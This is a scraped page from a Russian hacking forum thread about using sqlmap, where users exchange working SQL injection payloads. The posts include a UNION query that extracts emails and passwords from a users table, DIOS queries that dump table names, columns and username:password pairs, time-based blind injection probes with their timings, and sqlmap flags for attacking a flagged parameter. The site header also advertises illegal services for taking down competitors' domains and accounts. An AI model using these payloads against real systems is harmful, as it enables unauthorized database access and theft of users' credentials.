Вопросы по SQLMap

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 101 из 115

101

Опции темы

Поиск в этой теме

Опции просмотра

09.02.2020, 01:50

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от Xsite

↑
может кто то помочь , привести в виду DIOSa ?
5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi
хотя тут юнион , но при этом выводит 1 запись оч долго

может кто то помочь , привести в виду DIOSa ? - Это как?

𝕏 Twitter Reddit Telegram Копировать ссылку

09.02.2020, 01:52

Xsite

Новичок

Регистрация: 21.01.2010

Сообщений: 0

С нами: 8581933

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
может кто то помочь , привести в виду DIOSa ? - Это как?

как то так

https://defcon.ru/web-security/2320/

что бы он не по одной записи "выплевывал"

09.02.2020, 01:59

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от Xsite

↑
как то так
https://defcon.ru/web-security/2320/
что бы он не по одной записи "выплевывал"

Ну, загугли dios mssql.

п.с может лимит убрать?

09.02.2020, 02:05

Xsite

Новичок

Регистрация: 21.01.2010

Сообщений: 0

С нами: 8581933

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Ну, загугли dios mssql.
п.с может лимит убрать?

это mysql

п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2

SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o

09.02.2020, 05:07

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от Xsite

↑
это mysql
п.с зачем убирать лимит , если
https://rdot.org/forum/showthread.php?t=124&page=2
SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM
{TABLE_NAME}
LIMIT
{S}
,
{N}
)r WHERE (@p:=concat_ws(0x2c,@p,
{COLUMN_NAME}
))>0))o

И как это к sqlmap относиться ?

10.02.2020, 14:48

karkajoi

Постоянный

Регистрация: 26.10.2016

Сообщений: 438

С нами: 5025206

Репутация: 5

Цитата:

Сообщение от Xsite

Код:

(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)  - таблицы
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - колонки
(select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password))))x) - данные

И да не в той теме пост

15.02.2020, 21:01

karkajoi

Постоянный

Регистрация: 26.10.2016

Сообщений: 438

С нами: 5025206

Репутация: 5

Можно ли мапой посмотреть размер БД,таблиц,колонок ?

18.02.2020, 00:52

yuriy_ivanov

Новичок

Регистрация: 27.09.2017

Сообщений: 3

С нами: 4541366

Репутация: 0

Цитата:

Сообщение от karkajoi

↑
Можно ли мапой посмотреть размер БД,таблиц,колонок ?

та сразу юзай -D ... --columns --count

18.02.2020, 20:51

karkajoi

Постоянный

Регистрация: 26.10.2016

Сообщений: 438

С нами: 5025206

Репутация: 5

Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB

#10

21.02.2020, 18:04

NineCent

Новичок

Регистрация: 04.11.2018

Сообщений: 2

С нами: 3961046

Репутация: 0

Кто сможет помочь, Акунет нашел скулю слепую.

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7

Начинаю крутить Sql map пишу следующее

тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

Он мне пишет что параметр уязвим.

[16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable

it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Но потом ничего не находит

каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\

Что можно попробовать подскажите пожалуйста.